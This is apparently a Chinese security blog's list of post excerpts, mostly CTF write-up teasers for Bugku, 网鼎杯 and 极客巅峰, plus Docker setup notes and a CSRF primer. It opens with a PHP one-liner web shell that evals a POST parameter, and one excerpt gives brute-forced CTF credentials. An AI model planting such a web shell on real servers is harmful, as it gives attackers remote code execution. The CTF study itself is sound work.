<script language="php">@eval_r($_POST[sb])</script> 唔，学习了一波。 这道题目的去掉了, 不能用if(exp1,exp2,exp3)的方式。 然后我就恶补了一下 case when the...

无意中先刷一波bugku 的题目，赶紧还挺有意思的。 当碰到 一道php 反序列化的题目。看的一脸懵逼。可以读取到文件，但是无法理解拿flag 的操作。 后面大佬提点终于明白了，也引发了一些思考 ...

无意中在i春秋看了一篇文章   https://bbs.ichunqiu.com/thread-26617-1-1.html 刚好我本地弄了一个环境。

网鼎杯第四场，完全被虐着打，根本就打不过， 1、签到题 2、comment 爆破得到账号密码 zhangwei  zhangwei666 同时发现git 泄露 get 源代码。发现write_do.php 中很...

网鼎杯第三场wp 连续打了好几次网鼎杯这场是最累的。事在是太累了。到了五点半我实在是gang不住了。我请假回家了。emmmm 回去的路上我都感觉头晕难受 废话不多说了，直接上吧 1、签到题 ...

极客巅峰第二场wp 今天打了一场极客巅峰，因为第一场太忙了，没时间打，也错过了，今天的题目相对来说简单多了，比网鼎杯啥的。都比较简单。 CTF题目后续更新上去。我先上靶场题目。 1、 抛...

网鼎杯网络安全大赛-第二场Writeup 战队：DAFSEC 签到 falg{wangdingbei_nice} 2、套娃-misc  直接对第6张...

网鼎杯第一场WriteUP----china H.L.B 团队 1、签到题 回复1f5f2e进入下一关  2、Clip 下载题目是Disk 文件。第一反应是...

首先push 两个镜像 docker pull php:7.2.3-fpm docker pull nginx 然后启动一个php  docker run --name phpfpm -d -v /root/app:/app php:7.2.3-fpm ...

django之CSFR CSRF是什么？ CSRF（Cross-site request forgery）跨站请求伪造，也被称为“One Click Attack”或者Session Riding， 通常缩写为CSRF或者XSRF，是一种对...